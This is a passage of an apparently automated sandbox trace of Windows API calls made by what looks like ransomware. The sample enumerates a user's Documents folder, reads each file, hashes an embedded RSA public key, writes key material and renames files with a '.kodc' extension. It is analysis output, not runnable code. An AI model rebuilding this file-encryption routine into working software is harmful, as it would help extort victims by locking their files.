Flags=0x0, Size=0x558) returned 0x333b018 [0098.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aad8 | out: hHeap=0x630000) returned 1 [0098.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aaf0 | out: hHeap=0x630000) returned 1 [0098.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0098.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331aaf0 [0098.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0098.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331aad8 [0098.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0098.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0098.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0098.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.604] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.604] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aaf0 | out: hHeap=0x630000) returned 1 [0098.604] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.604] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aad8 | out: hHeap=0x630000) returned 1 [0098.604] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.604] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.604] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.604] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.604] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.604] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.604] GetCurrentThreadId () returned 0x42c [0098.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8f238 [0098.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.605] GetCurrentThreadId () returned 0x42c [0098.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aad8 [0098.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0098.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aaf0 [0098.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aac0 [0098.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ab08 [0098.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a5b0 [0098.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0098.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aad8 | out: hHeap=0x630000) returned 1 [0098.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aad8 [0098.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0098.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0098.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0098.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0098.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0098.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0098.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aad8 | out: hHeap=0x630000) returned 1 [0098.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0098.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0098.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0098.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0098.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0098.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab08 | out: hHeap=0x630000) returned 1 [0098.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aaf0 | out: hHeap=0x630000) returned 1 [0098.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aac0 | out: hHeap=0x630000) returned 1 [0098.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0098.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0098.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0098.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aaa8 | out: hHeap=0x630000) returned 1 [0098.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9d3c0 | out: hHeap=0x630000) returned 1 [0098.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0098.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0098.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0098.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0098.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0098.609] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x7be5, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x7be5, lpOverlapped=0x0) returned 1 [0098.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0098.609] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x7bea, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.609] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.610] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.610] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333b018 [0098.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333b018, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.610] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333a888 [0098.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.610] WriteFile (in: hFile=0x5cc, lpBuffer=0x333a888*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333a888*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0098.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.610] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.610] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.610] CloseHandle (hObject=0x5cc) returned 1 [0098.611] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.611] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0098.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.611] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PXJqZm5D98Ur_npQ.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pxjqzm5d98ur_npq.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PXJqZm5D98Ur_npQ.odt.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pxjqzm5d98ur_npq.odt.kodc")) returned 1 [0098.612] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.612] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.612] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.613] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.613] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4674ad80, ftCreationTime.dwHighDateTime=0x1d56238, ftLastAccessTime.dwLowDateTime=0xf4026ec0, ftLastAccessTime.dwHighDateTime=0x1d5b557, ftLastWriteTime.dwLowDateTime=0xf4026ec0, ftLastWriteTime.dwHighDateTime=0x1d5b557, nFileSizeHigh=0x0, nFileSizeLow=0x14882, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qkllquzP-m.xlsx", cAlternateFileName="QKLLQU~1.XLS")) returned 1 [0098.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.613] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.613] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qkllquzP-m.xlsx") returned=".xlsx" [0098.613] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qkllquzP-m.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qkllquzp-m.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.614] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=84098) returned 1 [0098.614] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.617] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1485c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.617] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.618] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.618] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.618] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x14882, lpOverlapped=0x0) returned 1 [0098.618] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.618] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.618] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.619] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.619] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.619] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.619] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.620] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.620] GetLastError () returned 0x0 [0098.620] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.620] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.620] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.620] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.620] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14880) returned 0x9ba4d90 [0098.620] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.621] 